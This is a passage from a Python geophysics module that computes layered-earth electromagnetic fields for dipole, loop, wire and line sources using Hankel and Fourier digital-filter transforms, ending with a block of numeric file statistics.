te_er_1 = np.dot(wt0, kernel[1] * model.lambda_) / model.r
te_er_2 = np.dot(wt1, kernel[1]) / model.r
tm_ez = np.dot(wt1, kernel[2] * model.lambda_ ** 2) / model.r
tm_hr_1 = np.dot(wt0, kernel[3] * model.lambda_) / model.r
tm_hr_2 = np.dot(wt1, kernel[3]) / model.r
te_hr_1 = np.dot(wt0, kernel[4] * model.lambda_) / model.r
te_hr_2 = np.dot(wt1, kernel[4]) / model.r
te_hz = np.dot(wt1, kernel[5] * model.lambda_**2) / model.r
amp_tm_ex_g_1 = (model.rx - model.sx) ** 2 \
/ (4 * np.pi * model.ytilde[model.rlayer - 1] \
* model.r ** 2)
amp_tm_ex_g_2 = - (2 * (model.rx - model.sx) ** 2 / model.r ** 3 \
- 1 / model.r) \
/ (4 * np.pi \
* model.ytilde[model.rlayer - 1])
amp_te_ex_g_1 = model.ztilde[model.slayer - 1] \
* (model.rx - model.sx) ** 2 \
/ (4 * np.pi * model.r ** 2)
amp_te_ex_g_2 = - model.ztilde[model.slayer - 1] \
* (2 * (model.rx - model.sx) ** 2 / model.r ** 3 \
- 1 / model.r) / (4 * np.pi)
amp_te_ex_line = - model.ztilde[model.slayer - 1] / (4 * np.pi)
amp_tm_ey_g_1 = (model.rx - model.sx) * (model.ry - model.sy) \
/ (4 * np.pi * model.ytilde[model.rlayer - 1] \
* model.r ** 2)
amp_tm_ey_g_2 = - (model.rx - model.sx) * (model.ry - model.sy) \
/ (2 * np.pi * model.ytilde[model.rlayer - 1] \
* model.r**3 )
amp_te_ey_g_1 = + model.ztilde[model.slayer - 1] \
* (model.rx - model.sx) * (model.ry - model.sy) \
/ (4 * np.pi * model.r ** 2)
amp_te_ey_g_2 = - model.ztilde[model.slayer - 1] \
* (model.rx - model.sx) * (model.ry - model.sy) \
/ (2 * np.pi * model.r ** 3)
amp_tm_ez = (model.rx - model.sx) \
/ (4 * np.pi * model.ytilde[model.rlayer - 1] \
* model.r)
amp_tm_hx_g_1 = (model.rx - model.sx) * (model.ry - model.sy) \
/ (4 * np.pi * model.r ** 2)
amp_tm_hx_g_2 = - (model.rx - model.sx) * (model.ry - model.sy) \
/ (2 * np.pi * model.r ** 3)
amp_te_hx_g_1 = + (model.rx - model.sx) * (model.ry - model.sy) \
/ (4 * np.pi * model.r ** 2) \
* model.ztilde[model.slayer - 1] \
/ model.ztilde[model.rlayer - 1]
amp_te_hx_g_2 = - (model.rx - model.sx) * (model.ry - model.sy) \
/ (2 * np.pi * model.r ** 3) \
* model.ztilde[model.slayer - 1] \
/ model.ztilde[model.rlayer - 1]
amp_tm_hy_g_1 = -(model.rx - model.sx) ** 2 \
/ (4 * np.pi * model.r ** 2)
amp_tm_hy_g_2 = (2 * (model.rx - model.sx) ** 2 / model.r ** 3 \
- 1 / model.r) / (4 * np.pi)
amp_te_hy_g_1 = - (model.rx - model.sx) ** 2 \
/ (4 * np.pi * model.r ** 2) \
* model.ztilde[model.slayer - 1] \
/ model.ztilde[model.rlayer - 1]
amp_te_hy_g_2 = (2 * (model.rx - model.sx) ** 2 / model.r ** 3 \
- 1 / model.r) / (4 * np.pi) \
* model.ztilde[model.slayer - 1] \
/ model.ztilde[model.rlayer - 1]
amp_te_hy_line = model.ztilde[model.slayer - 1] \
/ model.ztilde[model.rlayer - 1] \
/ (4 * np.pi)
amp_te_hz_line = model.ztilde[model.slayer - 1] \
/ model.ztilde[model.rlayer - 1] \
* (model.ry - model.sy) / (4 * np.pi * model.r)
ans["e_x"] = amp_tm_ex_g_1 * tm_er_1 + amp_tm_ex_g_2 * tm_er_2 \
+ amp_te_ex_g_1 * te_er_1 + amp_te_ex_g_2 * te_er_2 \
+ amp_te_ex_line * te_er_1
ans["e_y"] = amp_tm_ey_g_1 * tm_er_1 + amp_tm_ey_g_2 * tm_er_2 \
+ amp_te_ey_g_1 * te_er_1 + amp_te_ey_g_2 * te_er_2
ans["e_z"] = amp_tm_ez * tm_ez
ans["h_x"] = amp_tm_hx_g_1 * tm_hr_1 + amp_tm_hx_g_2 * tm_hr_2 \
+ amp_te_hx_g_1 * te_hr_1 + amp_te_hx_g_2 * te_hr_2
ans["h_y"] = amp_tm_hy_g_1 * tm_hr_1 + amp_tm_hy_g_2 * tm_hr_2 \
+ amp_te_hy_g_1 * te_hr_1 + amp_te_hy_g_2 * te_hr_2 \
+ amp_te_hy_line * te_hr_1
ans["h_z"] = amp_te_hz_line * te_hz
return ans
@staticmethod
def hedy(model, omega):
"""
"""
y_base, wt0, wt1 = filters.load_hankel_filter(model.hankel_filter)
model.filter_length = len(y_base)
model.lambda_ = y_base / model.r
kernel = kernels.compute_kernel_hed(model, omega)
ans = {}
tm_er_1 = np.dot(wt0, kernel[0] * model.lambda_) / model.r
tm_er_2 = np.dot(wt1, kernel[0]) / model.r
te_er_1 = np.dot(wt0, kernel[1] * model.lambda_) / model.r
te_er_2 = np.dot(wt1, kernel[1]) / model.r
tm_ez = np.dot(wt1, kernel[2] * model.lambda_**2) / model.r
tm_hr_1 = np.dot(wt0, kernel[3] * model.lambda_) / model.r
tm_hr_2 = np.dot(wt1, kernel[3]) / model.r
te_hr_1 = np.dot(wt0, kernel[4] * model.lambda_) / model.r
te_hr_2 = np.dot(wt1, kernel[4]) / model.r
te_hz = np.dot(wt1, kernel[5] * model.lambda_**2) / model.r
amp_tm_ex_g_1 = (model.rx - model.sx) * (model.ry - model.sy) \
/ (4 * np.pi * model.ytilde[model.rlayer - 1] \
* model.r ** 2)
amp_tm_ex_g_2 = - (model.rx - model.sx) * (model.ry - model.sy) \
/ (2 * np.pi * model.ytilde[model.rlayer - 1] \
* model.r ** 3)
amp_te_ex_g_1 = model.ztilde[model.slayer - 1] \
* (model.rx - model.sx) * (model.ry - model.sy) \
/ (4 * np.pi * model.r ** 2)
amp_te_ex_g_2 = - model.ztilde[model.slayer - 1] \
* (model.rx - model.sx) * (model.ry - model.sy) \
/ (2 * np.pi * model.r ** 3)
amp_tm_ey_g_1 = (model.ry - model.sy) ** 2 \
/ (4 * np.pi * model.ytilde[model.rlayer - 1] \
* model.r ** 2)
amp_tm_ey_g_2 = - (2 * (model.ry - model.sy) ** 2 / model.r ** 3 \
- 1 / model.r) \
/ (4 * np.pi* model.ytilde[model.rlayer - 1])
amp_te_ey_g_1 = model.ztilde[model.slayer - 1] \
* (model.ry - model.sy) ** 2 \
/ (4 * np.pi * model.r ** 2)
amp_te_ey_g_2 = -model.ztilde[model.slayer - 1] \
* (2 * (model.ry - model.sy) ** 2 / model.r ** 3 \
- 1 / model.r) / (4 * np.pi)
amp_te_ey_line = - model.ztilde[model.slayer - 1] / (4 * np.pi)
amp_tm_ez = (model.ry - model.sy) / (4 * np.pi \
* model.ytilde[model.rlayer - 1] * model.r)
amp_tm_hx_g_1 = (model.ry - model.sy) ** 2 \
/ (4 * np.pi * model.r ** 2)
amp_tm_hx_g_2 = - (2 * (model.ry - model.sy) ** 2 / model.r ** 3 \
- 1 / model.r) / (4 * np.pi)
amp_te_hx_g_1 = + (model.ry - model.sy) ** 2 \
/ (4 * np.pi * model.r ** 2) \
* model.ztilde[model.slayer - 1] \
/ model.ztilde[model.rlayer - 1]
amp_te_hx_g_2 = - (2 * (model.ry - model.sy) ** 2 / model.r ** 3 \
- 1 / model.r) / (4 * np.pi) \
* model.ztilde[model.slayer - 1] \
/ model.ztilde[model.rlayer - 1]
amp_te_hx_line = -model.ztilde[model.slayer - 1] \
/ model.ztilde[model.rlayer - 1] / (4 * np.pi)
amp_tm_hy_g_1 = - (model.rx - model.sx) * (model.ry - model.sy) \
/ (4 * np.pi * model.r ** 2)
amp_tm_hy_g_2 = (model.rx - model.sx) * (model.ry - model.sy) \
/ (2 * np.pi * model.r ** 3)
amp_te_hy_g_1 = - (model.rx - model.sx) * (model.ry - model.sy) \
/ (4 * np.pi * model.r ** 2) \
* model.ztilde[model.slayer - 1] \
/ model.ztilde[model.rlayer - 1]
amp_te_hy_g_2 = (model.rx - model.sx) * (model.ry - model.sy) \
/ (2 * np.pi * model.r ** 3) \
* model.ztilde[model.slayer - 1] \
/ model.ztilde[model.rlayer - 1]
amp_te_hz_line = -model.ztilde[model.slayer - 1] \
/ model.ztilde[model.rlayer - 1] \
* (model.rx - model.sx) / (4 * np.pi * model.r)
ans["e_x"] = amp_tm_ex_g_1 * tm_er_1 + amp_tm_ex_g_2 * tm_er_2 \
+ amp_te_ex_g_1 * te_er_1 + amp_te_ex_g_2 * te_er_2
ans["e_y"] = amp_tm_ey_g_1 * tm_er_1 + amp_tm_ey_g_2 * tm_er_2 \
+ amp_te_ey_g_1 * te_er_1 + amp_te_ey_g_2 * te_er_2 \
+ amp_te_ey_line * te_er_1
ans["e_z"] = amp_tm_ez * tm_ez
ans["h_x"] = amp_tm_hx_g_1 * tm_hr_1 + amp_tm_hx_g_2 * tm_hr_2 \
+ amp_te_hx_g_1 * te_hr_1 + amp_te_hx_g_2 * te_hr_2 \
+ amp_te_hx_line * te_hr_1
ans["h_y"] = amp_tm_hy_g_1 * tm_hr_1 + amp_tm_hy_g_2 * tm_hr_2 \
+ amp_te_hy_g_1 * te_hr_1 + amp_te_hy_g_2 * te_hr_2
ans["h_z"] = amp_te_hz_line * te_hz
return ans
@staticmethod
def circular_loop(model, omega):
"""
"""
y_base, wt0, wt1 = filters.load_hankel_filter(model.hankel_filter)
model.filter_length = len(y_base)
model.lambda_ = y_base / model.src.radius
kernel = kernels.compute_kernel_circular(model, omega)
ans = {}
e_phai = np.dot(wt1, kernel[0]) / model.src.radius
h_r = np.dot(wt1, kernel[1]) / model.src.radius
h_z = np.dot(wt1, kernel[2]) / model.src.radius
ans["e_x"] = model.ztilde[model.slayer - 1] * model.src.radius\
* model.sin_phi / 2 * e_phai
ans["e_y"] = -model.ztilde[model.slayer - 1] * model.src.radius\
* model.cos_phi / 2 * e_phai
ans["e_z"] = 0
ans["h_x"] = -model.src.radius * model.ztilde[model.slayer - 1]\
/ model.ztilde[model.rlayer - 1] \
* model.cos_phi / 2 * h_r
ans["h_y"] = -model.src.radius * model.ztilde[model.slayer - 1]\
/ model.ztilde[model.rlayer - 1] \
* model.sin_phi / 2 * h_r
ans["h_z"] = model.src.radius * model.ztilde[model.slayer - 1] \
/ model.ztilde[model.rlayer - 1] / 2 * h_z
return ans
@staticmethod
def coincident_loop(model, omega):
"""
"""
y_base, wt0, wt1 = filters.load_hankel_filter(model.hankel_filter)
model.filter_length = len(y_base)
model.lambda_ = y_base / model.r
kernel = kernels.compute_kernel_coincident(model, omega)
ans = {}
h_z_co = np.dot(wt1, kernel[0]) / model.src.radius
ans["e_x"] = 0
ans["e_y"] = 0
ans["e_z"] = 0
ans["h_x"] = 0
ans["h_y"] = 0
ans["h_z"] = (1 * np.pi * model.src.radius ** 2 * h_z_co)
return ans
@staticmethod
def grounded_wire(model, omega):
"""
"""
y_base, wt0, wt1 = filters.load_hankel_filter(model.hankel_filter)
model.filter_length = len(y_base)
y_base_wire = np.ones((model.filter_length, model.src.nsplit)) \
* np.array([y_base]).T
lambda_ = y_base_wire / model.rn
kernel = np.zeros((6, model.filter_length, model.src.nsplit), dtype=complex)
for i in range(model.src.nsplit):
model.lambda_ = lambda_[:,i]
kernel[:,:,i] = kernels.compute_kernel_hed(model, omega)
model.lambda_ = lambda_
tm_er_g_first = np.dot(wt1, kernel[0][:, 0]) / model.rn[0]
tm_er_g_end = np.dot(wt1, kernel[0][:, model.src.nsplit - 1]) \
/ model.rn[model.src.nsplit - 1]
te_er_g_first = np.dot(wt1, kernel[1][:, 0]) / model.rn[0]
te_er_g_end = np.dot(wt1, kernel[1][:, model.src.nsplit - 1]) \
/ model.rn[model.src.nsplit - 1]
tm_ez_1 = np.dot(wt0, kernel[2][:, 0] * model.lambda_[:, 0]) \
/ model.rn[0]
tm_ez_2 = np.dot(wt0, kernel[2][:, model.src.nsplit - 1] \
* model.lambda_[:, model.src.nsplit - 1]) \
/ model.rn[model.src.nsplit - 1]
tm_hr_g_first = np.dot(wt1, kernel[3][:, 0]) / model.rn[0]
tm_hr_g_end = np.dot(wt1, kernel[3][:, model.src.nsplit - 1]) \
/ model.rn[model.src.nsplit - 1]
te_hr_g_first = np.dot(wt1, kernel[4][:, 0]) / model.rn[0]
te_hr_g_end = np.dot(wt1, kernel[4][:, model.src.nsplit - 1]) \
/ model.rn[model.src.nsplit - 1]
te_hz_l = np.dot(wt1, kernel[5] * model.lambda_ ** 2) / model.rn
te_ex_l = np.dot(wt0, kernel[1] * model.lambda_) / model.rn
te_hy_l = np.dot(wt0, kernel[4] * model.lambda_) / model.rn
amp_tm_ex_1 = (model.xx[0] / model.rn[0]) \
/ (4 * np.pi * model.ytilde[model.rlayer - 1])
amp_tm_ex_2 = (-model.xx[model.src.nsplit-1] \
/ model.rn[model.src.nsplit-1]) \
/ (4 * np.pi * model.ytilde[model.rlayer - 1])
amp_te_ex_1 = (model.xx[0] / model.rn[0]) \
* model.ztilde[model.slayer - 1] / (4 * np.pi)
amp_te_ex_2 = (-model.xx[model.src.nsplit-1] \
/ model.rn[model.src.nsplit-1]) \
* model.ztilde[model.slayer - 1] / (4 * np.pi)
te_ex_line = -model.ztilde[model.slayer - 1] / (4 * np.pi)
amp_tm_ey_1 = (model.yy[0] / model.rn[0]) \
/ (4 * np.pi * model.ytilde[model.rlayer - 1])
amp_tm_ey_2 = (-model.yy[model.src.nsplit-1] \
/ model.rn[model.src.nsplit-1]) \
/ (4 * np.pi * model.ytilde[model.rlayer - 1])
amp_te_ey_1 = (model.yy[0] / model.rn[0]) \
* model.ztilde[model.slayer - 1] / (4 * np.pi)
amp_te_ey_2 = (-model.yy[model.src.nsplit-1] \
/ model.rn[model.src.nsplit-1]) \
* model.ztilde[model.slayer - 1] / (4 * np.pi)
amp_tm_ez_1 = 1 / (4 * np.pi * model.ytilde[model.rlayer - 1])
amp_tm_ez_2 = -1 / (4 * np.pi * model.ytilde[model.rlayer - 1])
amp_tm_hx_1 = 1 / (4 * np.pi) * model.yy[0] / model.rn[0]
amp_tm_hx_2 = - 1 / (4 *np.pi) * model.yy[model.src.nsplit-1] \
/ model.rn[model.src.nsplit-1]
amp_te_hx_1 = model.ztilde[model.slayer - 1] \
/ model.ztilde[model.rlayer - 1] / (4 * np.pi) \
* model.yy[0] / model.rn[0]
amp_te_hx_2 = - model.ztilde[model.slayer - 1] \
/ model.ztilde[model.rlayer - 1] / (4 *np.pi) \
* model.yy[model.src.nsplit-1] \
/ model.rn[model.src.nsplit-1]
amp_tm_hy_1 = -1 / (4 * np.pi) * model.xx[0] / model.rn[0]
amp_tm_hy_2 = 1 / ( 4 *np.pi) * model.xx[model.src.nsplit-1] \
/ model.rn[model.src.nsplit-1]
amp_te_hy_1 = -model.ztilde[model.slayer - 1] \
/ model.ztilde[model.rlayer - 1] / (4 * np.pi) \
* model.xx[0] / model.rn[0]
amp_te_hy_2 = model.ztilde[model.slayer - 1] \
/ model.ztilde[model.rlayer - 1] / (4 * np.pi) \
* model.xx[model.src.nsplit-1] \
/ model.rn[model.src.nsplit-1]
te_hy_line = model.ztilde[model.slayer - 1] \
/ model.ztilde[model.rlayer - 1] / (4 * np.pi)
rot_ans = {}
rot_ans["e_x"] = (amp_tm_ex_1 * tm_er_g_first \
+ amp_tm_ex_2 * tm_er_g_end \
+ amp_te_ex_1 * te_er_g_first \
+ amp_te_ex_2 * te_er_g_end) \
+ te_ex_line * model.ds \
* np.dot(te_ex_l, np.ones((model.src.nsplit)))
rot_ans["e_y"] = amp_tm_ey_1 * tm_er_g_first + amp_tm_ey_2 * tm_er_g_end \
+ amp_te_ey_1 * te_er_g_first \
+ amp_te_ey_2 * te_er_g_end
rot_ans["e_z"] = amp_tm_ez_1 * tm_ez_1 + amp_tm_ez_2 * tm_ez_2
rot_ans["h_x"] = (amp_tm_hx_1 * tm_hr_g_first \
+ amp_tm_hx_2 * tm_hr_g_end \
+ amp_te_hx_1 * te_hr_g_first \
+ amp_te_hx_2 * te_hr_g_end)
rot_ans["h_y"] = amp_tm_hy_1 * tm_hr_g_first \
+ amp_tm_hy_2 * tm_hr_g_end \
+ amp_te_hy_1 * te_hr_g_first \
+ amp_te_hy_2 * te_hr_g_end \
+ te_hy_line * model.ds \
* np.dot(te_hy_l, np.ones((model.src.nsplit)))
rot_ans["h_z"] = np.dot(model.ztilde[model.slayer - 1] \
/ model.ztilde[model.rlayer - 1] \
* model.yy / model.rn * model.ds / (4*np.pi) \
,te_hz_l.T)
ans = {}
ans["e_x"] = model.cos_theta * rot_ans["e_x"] - model.sin_theta * rot_ans["e_y"]
ans["e_y"] = model.cos_theta * rot_ans["e_y"] + model.sin_theta * rot_ans["e_x"]
ans["e_z"] = rot_ans["e_z"]
ans["h_x"] = model.cos_theta * rot_ans["h_x"] - model.sin_theta * rot_ans["h_y"]
ans["h_y"] = model.cos_theta * rot_ans["h_y"] + model.sin_theta * rot_ans["h_x"]
ans["h_z"] = rot_ans["h_z"]
return ans
@staticmethod
def loop_source(model, omega):
"""
"""
y_base, wt0, wt1 = filters.load_hankel_filter(model.hankel_filter)
model.filter_length = len(y_base)
model.lambda_ = y_base / model.r
kernel = kernels.compute_kernel_hed(model, omega)
ans = {}
te_ex_l = np.dot(wt0, kernel[1] * model.lambda_) / model.rn
te_hy_l = np.dot(wt0, kernel[4] * model.lambda_) / model.rn
te_hz_l = np.dot(wt1, kernel[5] * model.lambda_ ** 2) / model.rn
te_ex_line = -model.ztilde[model.slayer - 1] / (4 * np.pi)
te_hy_line = model.ztilde[model.slayer - 1] \
/ model.ztilde[model.rlayer - 1] / (4 * np.pi)
ans["e_x"] = te_ex_line * model.ds \
* np.dot(te_ex_l, np.ones((model.src.num_dipole,1)))
ans["e_y"] = 0
ans["e_z"] = 0
ans["h_x"] = 0
ans["h_y"] = te_hy_line * model.ds \
* np.dot(te_hy_l, np.ones((model.src.num_dipole,1)))
ans["h_z"] = np.dot(model.ztilde[model.slayer - 1] \
/ model.ztilde[model.rlayer - 1] \
* model.yy / model.rn * model.ds / (4*np.pi) \
, te_hz_l.T)
return ans
@staticmethod
def x_line_source(model, omega):
"""
"""
y_base, wt0, wt1 = filters.load_hankel_filter(model.hankel_filter)
model.filter_length = len(y_base)
model.lambda_ = y_base / model.r
kernel = kernels.compute_kernel_hed(model, omega)
ans = {}
te_er_1 = np.dot(wt0, kernel[1] * model.lambda_) / model.r
te_hr_1 = np.dot(wt0, kernel[4] * model.lambda_) / model.r
te_hz = np.dot(wt1, kernel[5] * model.lambda_**2) / model.r
amp_te_ex_line = - model.ztilde[model.slayer - 1] / (4 * np.pi)
amp_te_hy_line = model.ztilde[model.slayer - 1] \
/ model.ztilde[model.rlayer - 1] / (4 * np.pi)
amp_te_hz_line = model.ztilde[model.slayer - 1] \
/ model.ztilde[model.rlayer - 1] \
* (model.ry - model.sy) / (4 * np.pi * model.r)
ans["e_x"] = model.ds * amp_te_ex_line * te_er_1
ans["e_y"] = 0
ans["e_z"] = 0
ans["h_x"] = 0
ans["h_y"] = model.ds * amp_te_hy_line * te_hr_1
ans["h_z"] = model.ds * amp_te_hz_line * te_hz
return ans
@staticmethod
def y_line_source(model, omega):
"""
"""
y_base, wt0, wt1 = filters.load_hankel_filter(model.hankel_filter)
model.filter_length = len(y_base)
model.lambda_ = y_base / model.r
kernel = kernels.compute_kernel_hed(model, omega)
ans = {}
te_er_1 = np.dot(wt0, kernel[1] * model.lambda_) / model.r
te_hr_1 = np.dot(wt0, kernel[4] * model.lambda_) / model.r
te_hz = np.dot(wt1, kernel[5] * model.lambda_ ** 2) / model.r
amp_te_ey_line = - model.ztilde[model.slayer - 1] / (4 * np.pi)
amp_te_hx_line = -model.ztilde[model.slayer - 1] \
/ model.ztilde[model.rlayer - 1] / (4 * np.pi)
amp_te_hz_line = - model.ztilde[model.slayer - 1] \
/ model.ztilde[model.rlayer - 1] \
* (model.rx - model.sx) / (4 * np.pi * model.r)
ans["e_x"] = 0
ans["e_y"] = model.ds * amp_te_ey_line * te_er_1
ans["e_z"] = 0
ans["h_x"] = model.ds * amp_te_hx_line * te_hr_1
ans["h_y"] = 0
ans["h_z"] = model.ds * amp_te_hz_line * te_hz
return ans
class FourierTransform:
@staticmethod
def euler_transform(model, time):
"""
Frequency-to-time conversion using the Euler filter as the digital filter
for the Fourier transform. Variants without time differentiation are
planned for a later implementation.
"""
ans = {}
y_base_time, wt0_time, wt1_time = filters.load_fft_filter(
'raito_time_250')
filter_length_time = len(y_base_time)
e_x_set = np.zeros((filter_length_time, 1), dtype=complex)
e_y_set = np.zeros((filter_length_time, 1), dtype=complex)
e_z_set = np.zeros((filter_length_time, 1), dtype=complex)
h_x_set = np.zeros((filter_length_time, 1), dtype=complex)
h_y_set = np.zeros((filter_length_time, 1), dtype=complex)
h_z_set = np.zeros((filter_length_time, 1), dtype=complex)
time_range = time - model.src.freqtime[0]
omega_set = y_base_time / time_range
for ii in range(filter_length_time):
omega = omega_set[ii]
hankel_result = model.src.hankel_transform(model, omega)
e_x_set[ii] = hankel_result["e_x"]
e_y_set[ii] = hankel_result["e_y"]
e_z_set[ii] = hankel_result["e_z"]
h_x_set[ii] = hankel_result["h_x"]
h_y_set[ii] = hankel_result["h_y"]
h_z_set[ii] = hankel_result["h_z"]
ans["e_x"] = -np.dot(wt1_time.T, np.imag(e_x_set)) \
* (2.0 * time_range / np.pi) ** 0.5 / time_range
ans["e_y"] = -np.dot(wt1_time.T, np.imag(e_y_set)) \
* (2.0 * time_range / np.pi) ** 0.5 / time_range
ans["e_z"] = -np.dot(wt1_time.T, np.imag(e_z_set)) \
* (2.0 * time_range / np.pi) ** 0.5 / time_range
ans["h_x"] = -np.dot(wt1_time.T, np.imag(h_x_set)) \
* (2.0 * time_range / np.pi) ** 0.5 / time_range
ans["h_y"] = -np.dot(wt1_time.T, np.imag(h_y_set)) \
* (2.0 * time_range / np.pi) ** 0.5 / time_range
ans["h_z"] = -np.dot(wt1_time.T, np.imag(h_z_set)) \
* (2.0 * time_range / np.pi) ** 0.5 / time_range
return ans
@staticmethod
def fast_fourier_transform(model, f, time, time_diff):
"""
Frequency-to-time-domain conversion via the Fourier sine/cosine transform.
(Computation is sped up by cubic spline interpolation.)
f : -
polynomial approximation, obtained by spline interpolation, of the
electromagnetic response in the frequency domain
"""
base, cos, sin = filters.load_fft_filter(
'anderson_sin_cos_filter_787')
if not time_diff:
omega_base = base / time
f = f(omega_base)
f_imag = -2 / np.pi * np.imag(f) / omega_base
ans = np.dot(f_imag, cos.T) / time
else:
omega_base = base / time
f = f(omega_base)
f_imag = 2 / np.pi * np.imag(f)
ans = np.dot(f_imag, sin.T) / time
return ans
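# Added annotation: the two branches above implement the standard identities
# for recovering a causal time-domain signal from Im[H(omega)], as commonly
# used in EM geophysics,
#     step response:    h(t) = -(2/pi) * integral( Im[H(w)] / w * cos(w t) dw )
#     impulse response: h(t) =  (2/pi) * integral( Im[H(w)] * sin(w t) dw )
# each evaluated as a digital-filter dot product over w = base / t.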
# TODO DLAG: the code has a lot of redundancy and needs fixing; deprecated until the fix is complete.
@staticmethod
def dlagf0em(model, nb, emfield):
abscis = 0.7866057737580476e0
e = 1.10517091807564762e0
er = .904837418035959573e0
nofun = 0
base, cos, sin = filters.load_fft_filter(
'anderson_sin_cos_filter_787')
ffl = len(base)
bmax = model.src.freqtime[-1]
tol = 1e-12
ntol = 1
key = np.zeros(ffl)
dwork = np.zeros(ffl)
dans = np.zeros(nb)
arg = np.zeros(nb)
if (nb < 1 or bmax <= 0.0e0):
raise Exception('TimeRangeError: End of time is too early.')
y = bmax * er ** (np.fix(nb) - 1)
if (y <= 0.0e0):
raise Exception('TimeRangeError: End of time is too early.')
i = ffl + 1
nb1 = np.fix(nb) + 1
y1 = abscis / bmax
lag = -1
for ilag in range(1, nb+1):
lag += 1
istore = int(nb1 - ilag)  # built-in int: np.int was removed from NumPy
if lag > 0:
y1 *= e
arg[istore-1] = abscis / y1
none = 0
itol = np.fix(ntol)
dsum = 0.0e0
cmax = 0.0e0
y = y1
m = 20
i = 426
y *= e
look = i + lag
iq = look // (ffl + 1)  # integer division for index arithmetic
ir = look % (ffl + 1)
if (ir == 0):
ir = 1
iroll = iq * ffl
if (key[ir-1] <= iroll):
key[ir-1] = iroll + ir
g = y
hankel_result = model.src.hankel_transform(model, g)
dwork[ir-1] = np.imag(hankel_result[emfield]) / g
nofun = np.fix(np.fix(nofun) + 1)
c = dwork[ir-1] * cos[i-1]
dsum = dsum + c
goon = 1
while (m != 0):
while (goon == 1):
if (m == 20):
cmax = np.max([abs(c), cmax])
i = i + 1
y = y * e
if (i <= 461):
break
if (cmax == 0.0e0):
none = 1
cmax = tol * cmax
m = 30
break
if (m == 30):
if not (abs(c) <= cmax):
itol = np.fix(ntol)
i = i + 1
y = y * e
if (i <= ffl):
break
itol = itol - 1
goon1 = 1
while (itol > 0 and i < ffl):
i = i + 1
y = y * e
if (i <= ffl):
goon1 = 0
break
itol = itol - 1
if (goon1 == 0):
break
itol = np.fix(ntol)
y = y1
m = 60
i = 425
break
if (m == 60):
if not (abs(c) <= cmax and none == 0):  # ???
itol = np.fix(ntol)
i = i - 1
y = y * er
if (i > 0):
break
itol = itol - 1
goon1 = 1
while (itol > 0 and i > 1):
i = i - 1
y = y * er
if (i > 0):
goon1 = 0
break
itol = itol - 1
if (goon1 == 0):
break
goon = 0
m = 0
if goon != 0:
look = i + ilag
iq = look // (ffl + 1)
ir = look % (ffl+1)
if (ir == 0):
ir = 1
iroll = iq * 787
if (key[ir-1] <= iroll):
key[ir-1] = iroll + ir
g = y
hankel_result = model.src.hankel_transform(model, g)
dwork[ir-1] = np.imag(hankel_result[emfield]) / g
nofun = np.fix(np.fix(nofun) + 1)
c = dwork[ir-1] * cos[i-1]
dsum = dsum + c
dans[istore-1] = dsum
continue
return dans, arg
@staticmethod
def dlagf1em(model, nb, emfield):
abscis = 0.7745022656977834e0
e = 1.10517091807564762e0
er = .904837418035959573e0
nofun = 0
base, cos, sin = filters.load_fft_filter(
'anderson_sin_cos_filter_787')
ffl = len(base)
bmax = model.src.freqtime[-1]
tol = 1e-12
ntol = 1
key = np.zeros((ffl))
dwork = np.zeros((ffl))
dans = np.zeros(nb)
arg = np.zeros(nb)
if (nb < 1 or bmax <= 0.0e0):
raise Exception('TimeRangeError: End of time is too early.')
y = bmax * er ** (np.fix(nb) - 1)
if (y <= 0.0e0):
raise Exception('TimeRangeError: End of time is too early.')
ierr = 0
i = ffl + 1
nb1 = np.fix(nb) + 1
y1 = abscis / bmax
lag = -1
for ilag in range(1, nb + 1):
lag += 1
istore = int(nb1 - ilag)  # mirrors dlagf0em's indexing so istore stays in 1..nb
if lag > 0:
y1 *= e
arg[istore-1] = abscis / y1
none = 0
itol = np.fix(ntol)
dsum = 0.0e0
cmax = 0.0e0
y = y1
m = 20
i = 426
y = y * e
look = i + lag
iq = look // (ffl + 1)
ir = look % (ffl + 1)
if (ir == 0):
ir = 1
iroll = iq * ffl
if (key[ir-1] <= iroll):
key[ir-1] = iroll + ir
g = y
hankel_result = model.src.hankel_transform(model, g)
dwork[ir-1] = np.imag(hankel_result[emfield])
nofun = np.fix(np.fix(nofun) + 1)
c = dwork[ir-1] * sin[i-1]
dsum = dsum + c
goon = 1
while (m != 0):
while (goon == 1):
if (m == 20):
cmax = np.max([abs(c), cmax])
i = i + 1
y = y * e
if (i <= 463):
break
if (cmax == 0.0e0):
none = 1
cmax = tol * cmax
m = 30
break
if (m == 30):
if not (abs(c) <= cmax):
itol = np.fix(ntol)
i = i + 1
y = y * e
if (i <= 787):
break
itol = itol - 1
goon1 = 1
while (itol > 0 and i < 787):
i = i + 1
y = y * e
if (i <= 787):
goon1 = 0
break
itol = itol - 1
if (goon1 == 0):
break
itol = np.fix(ntol)
y = y1
m = 60
i = 425
break
if (m == 60):
if not (abs(c) <= cmax and none == 0):
itol = np.fix(ntol)
i = i - 1
y = y * er
if (i > 0):
break
itol = itol - 1
goon1 = 1
while itol > 0 and i > 1:
i = i - 1
y = y * er
if i > 0:
goon1 = 0
break
itol = itol - 1
if goon1 == 0:
break
goon = 0
m = 0
if goon != 0:
look = i + ilag
iq = look // (ffl + 1)
ir = look % (ffl + 1)
if ir == 0:
ir = 1
iroll = iq * 787
if key[ir-1] <= iroll:
key[ir-1] = iroll + ir
g = y
hankel_result = model.src.hankel_transform(model, g)
dwork[ir-1] = np.imag(hankel_result[emfield])
nofun = np.fix(np.fix(nofun) + 1)
c = dwork[ir-1] * sin[i-1]
dsum = dsum + c
dans[istore-1] = dsum
continue
return dans, arg
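# Hedged usage sketch (illustrative, not part of the original module). The
# `model` object and the 100 Hz frequency are assumptions inferred from how
# the methods read their inputs; a real model is expected to supply
# hankel_filter, r, rx/ry, sx/sy, slayer/rlayer, ztilde/ytilde, sin_phi,
# cos_phi, and (for loop/wire sources) a src descriptor.
#
#     omega = 2.0 * np.pi * 100.0            # angular frequency at 100 Hz
#     fields = HankelTransform.vmd(model, omega)
#     print(fields["e_x"], fields["h_z"])    # complex field components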
| 45.581439
| 88
| 0.446317
| 6,498
| 48,134
| 3.074177
| 0.04109
| 0.053765
| 0.092111
| 0.035543
| 0.903985
| 0.882859
| 0.852974
| 0.827393
| 0.810423
| 0.796706
| 0
| 0.049161
| 0.41935
| 48,134
| 1,055
| 89
| 45.624645
| 0.665498
| 0.024349
| 0
| 0.699674
| 0
| 0
| 0.011967
| 0.001734
| 0
| 0
| 0
| 0.000948
| 0
| 1
| 0.01741
| false
| 0
| 0.002176
| 0
| 0.039173
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
